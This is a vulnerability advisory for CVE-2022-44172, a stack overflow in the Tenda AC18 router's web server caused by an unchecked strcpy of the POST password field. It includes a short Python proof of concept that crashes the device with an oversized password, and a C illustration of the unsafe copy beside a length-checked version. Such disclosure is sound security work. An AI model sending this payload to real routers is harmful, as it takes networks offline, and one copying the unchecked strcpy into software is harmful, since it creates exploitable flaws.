CVE-2022-44172: IoT_vuln/Tenda_AC18_V15.03.05.19_Vuln_password.md at main · RobinWang825/IoT_vuln
Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function R7WebsSecurityHandler.
Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability
Product
- product information: https://www.tenda.com.cn/
- firmware download: https://www.tenda.com.cn/download/detail-2683.html
Affected version
V15.03.05.19
Vulnerability
The stack overflow vulnerability is in /bin/httpd. It occurs in the R7WebsSecurityHandler function.
The function uses strcpy to copy the POST parameter password directly into a local variable on the stack without verifying its length, causing a stack overflow. This vulnerability allows attackers to cause a Denial of Service (DoS).
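The unchecked copy described above, next to a length-checked version, as an added example (not code from the firmware or from the original advisory). The buffer size `PASSWORD_MAX`, the names `handler_unsafe`, `form_value` and `handler_checked`, and the sample request bodies are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define PASSWORD_MAX 64 /* assumed; the advisory does not give the real buffer size */

/* Pattern the advisory describes (never called here): copy length is set by the request. */
void handler_unsafe(const char *password) {
    char local[PASSWORD_MAX];
    strcpy(local, password); /* no length check: long input overruns the stack buffer */
    (void)local;
}

/* Locate `name` in a form-urlencoded body; returns the value start and its length.
 * Simplification: values are not percent-decoded. */
static const char *form_value(const char *body, const char *name, size_t *len) {
    size_t nlen = strlen(name);
    for (const char *p = body; *p; ) {
        const char *end = strchr(p, '&');
        if (!end) end = p + strlen(p);
        if ((size_t)(end - p) > nlen && !strncmp(p, name, nlen) && p[nlen] == '=') {
            *len = (size_t)(end - p) - nlen - 1;
            return p + nlen + 1;
        }
        p = *end ? end + 1 : end;
    }
    return NULL;
}

/* Hardened form: 0 on success, -1 if the field is missing, -2 if it does not fit. */
int handler_checked(const char *body, char *out, size_t out_size) {
    size_t len;
    const char *v = form_value(body, "password", &len);
    if (!v) return -1;
    if (len >= out_size) return -2; /* reject instead of truncating a credential */
    memcpy(out, v, len);
    out[len] = '\0';
    return 0;
}

int main(void) {
    char out[PASSWORD_MAX], body[9 + 0x400 + 1] = "password=";
    memset(body + 9, 'A', 0x400); /* constructed input: same length as the PoC value */
    body[9 + 0x400] = '\0';
    printf("oversized: %d\n", handler_checked(body, out, sizeof out));
    printf("normal:    %d\n", handler_checked("username=admin&password=hunter2", out, sizeof out));
    return 0;
}
```

Rejecting the request is preferable to silently truncating, since a truncated password would change what is compared during authentication.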
PoC
PoC of Denial of Service (DoS)
```python
import requests

# 0x400 bytes sent as the password POST parameter
pl = b"A" * 0x400
data = {
    b"password": pl
}
res = requests.post("http://192.168.0.1/goform/helloworld", data=data)
print(res.content)
```